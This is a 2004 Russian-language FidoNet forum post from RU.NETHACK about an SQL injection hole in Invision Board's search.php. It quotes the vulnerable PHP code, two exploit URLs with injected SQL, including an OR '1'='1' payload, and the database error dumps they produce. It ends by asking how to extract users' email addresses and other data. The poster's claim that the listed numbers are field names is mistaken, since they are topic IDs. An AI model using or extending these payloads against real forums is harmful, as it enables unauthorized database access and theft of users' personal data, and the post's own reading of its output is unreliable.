|
ru.nethack
- RU.NETHACK -------------------------------------------------------------------
From : Dmitry Pikalov 2:5064/43.12 02 Mar 2004 00:43:21
To : All
Subject : Кто силен в Sql инъекциях?
--------------------------------------------------------------------------------
Кто силен в Sql инъекциях?
вот есть такая уязвимость:
Уязвимость обнаружена в Invision Board Forum в "sources/search.php". Удаленный
пользователь
может выполнить произвольный SQL код на основной базе данных.
Уязвимый код:
if (isset($ibforums->input['st']) )
{
$this->first = $ibforums->input['st'];
}
Эксплоит:
<http://www.board.com/forum/index.php?act=Search&nav=lv&CODE=show&>
searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL code]/*
при его использовании выдает следующее:
mySQL query error: SELECT t.*, f.id as forum_id, f.name as forum_name
FROM ibf_topics t
LEFT JOIN ibf_forums f ON (f.id=t.forum_id)
WHERE t.tid
IN(0,89201,89746,1403,157,815,3129,5698,1455,5732,1379,1939,5733,3576,2861,5182
1418,7034,1316,8151,8642,8856,9856,2303,10520,10675,11514,11513,11663,11975,121
7,12246,11758,14161,13314,15615,15599,15207,15794,18037,18457,19033,19684,19492
19944,20158,20251,20245,21970,22020,21959,22845,22722,23698,24440,24712,24896,2
305,24811,25312,25424,24694,25562,24180,24813,25711,26055,26086,26127,26342,263
4,26202,26408,26429,26333,26500,26529,25785,26610,26929,27387,27778,27789,25593
28409,28656,29165,29183,29186,29348,29444,29219,24954,29772,19412,30132,30439,3
773,28306,33279,35529,36045,36128,36131,36388,36399,36848,37038,38109,41536,416
7,41447,41933,41765,42166,40490,42300,42342,22526,43133,6645,43878,36868,44565,
4740,45190,45492,45524,45306,45593,45760,46422,47537,47857,48725,49181,49086,39
48,49012,49711,49747,49810,49949,50284,50306,50678,50715,51121,51732,51425,5192
,52492,52397,52787,52960,50017,53062,53218,53508,53511,53299,53942,53980,50184,
4151,54179,53117,55342,55832,55835,55985,56326,56396,56112,57173,57318,57036,57
99,56851,57485,57747,57367,58293,57932,57729,53345,59344,59225,59733,56946,6016
,60877,60934,60931,61486,61655,61909,61907,61932,62242,62295,62309,62437,62455,
2627,62785,63032,63665,64166,65100,65154,65165,65169,65181,65395,65415,65419,64
73,65480,65490,65644,65770,66327,65046,43391,65970,65251,58140,67017,67124,6735
,66763,67640,67661,67662,67784,67853,68400,68564,68515,68275,68679,68905,68926,
9209,69283,70002,70197,70214,70216,70248,70335,70551,70673,70641,70735,63086,71
63,71452,71569,73411,73203,74416,74940,74990,74894,74860,75468,76438,76507,7659
,77134,77213,77225,78067,78021,78474,78439,79249,79553,79785,70585,80440,80815,
0941,81530,78890,82166,82861,84076,84045,84157,84159,84292,84856,84962,85032,85
81,85464,85818,86151,86152,86184,86585,86320,85480,87202,87195,86416,87468,8762
,87748,87878,87830,72096,71754,87817,87978,87820,88395,88252,88485,88473,88527,
8482,88557,88785,88959,89099,89124,89215,89286,89626,89951,88587,89687,89279,87
27,90100,90067,90354,90386,90652,91002,90389,91241,91636,91770,91640,92211,9237
,92392,92473,93003,92639,93066,93071,92309,93159,93463,93813,92003,94516,94107,
4989,94469,95139,92252,85359,95935,95467,95636,96663,96811,91179,97867,98156,99
01,99141,99328,99362,99454,99442,99814,99790,100010,100378,100540,100628,100394
101003,101044,101074,101248,98682,101320,100914,102124,102126,102392,103353,103
59,103538,104153,103783,104179,103692,103975,105213,105255,105311,105163,105501
105500,105960,104731,106234,106583,106857,107860,108874,107605,108667,107836,10
580,109857,112104,112469,107968,113368,113684,113752,114429,114527,114550,11456
,114837,114909,114986,115130,115133,115135,115153,115159,115199,115184,115431,1
5489,115626,115637,115762,115765,115860,115976,116027,108546,116938,117005,1171
9,117161,117518,117668,119494,117656,120402,120403,120413,120479,120834,120157,
21630,121855,121647,122036,120561,123941,124994,124563,126598,127335,127638,127
23,128853,128810,129194,129682,130421,130537,129794,131101,132168,132781,133408,
134637,129901,136036,136058,136288,137121,137136,137695,138469,139720,141183,139
394,141826,142328,143105,143239,143605,143850,144052,145312,145308,0)
ORDER BY t.pinned DESC, t.last_post desc
LIMIT show t.forum_id,25
mySQL error: You have an error in your SQL syntax. Check the manual that
corresponds to your
MySQL server version for the right syntax to use near 'show t.forum_id,25' at
line 6
mySQL error code:
Date: Monday 01st of March 2004 09:07:10 PM
понятно, чтоинфа извлекается из таблиц f.id as forum_id, f.name as forum_name.
если манипулировать данными в result_type:
<http://www.xxx.com/forums/index.php?act=Search&CODE=show&searchid=9d31bad6f1842
a950726d4bd6f45efb0&search_in=posts&result_type=[любые>
данные]&highlite=&st=20users' OR '1'='1'/*
получаем уже данные из других таблиц:
mySQL query error: SELECT t.*, p.pid, p.author_id, p.author_name, p.post_date,
p.post, f.id
as forum_id, f.name as forum_name, f.use_html, g.g_dohtml
FROM ibf_posts p
LEFT JOIN ibf_topics t ON (t.tid=p.topic_id)
LEFT JOIN ibf_forums f ON (f.id=p.forum_id)
LEFT JOIN ibf_members m ON (m.id=p.author_id)
LEFT JOIN ibf_groups g ON (m.mgroup=g.g_id)
WHERE p.pid
IN(0,1887,2983,4587,704524,12492,14879,15791,15808,15813,15829,15830,15992,16089
,16547,17175,17920,18722,23046,28017,34148,36153,43601,46307
и т. д.
вопрос вот какой, как просмотреть ну например мыла юзеров или какую другую инфу
о них?
З.Ы. номера: 89201,89746,1403,157 - это названия полей в которых лежат данные о
пользователях.
Здоровица Вам ...
Dmitry Pikalov
---
* Origin: Original WinPoint Origin! (2:5064/43.12)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
| Тема: |
Автор: |
Дата: |
|
Кто силен в Sql инъекциях? |
Dmitry Pikalov |
02 Mar 2004 00:43:21 |
|
|
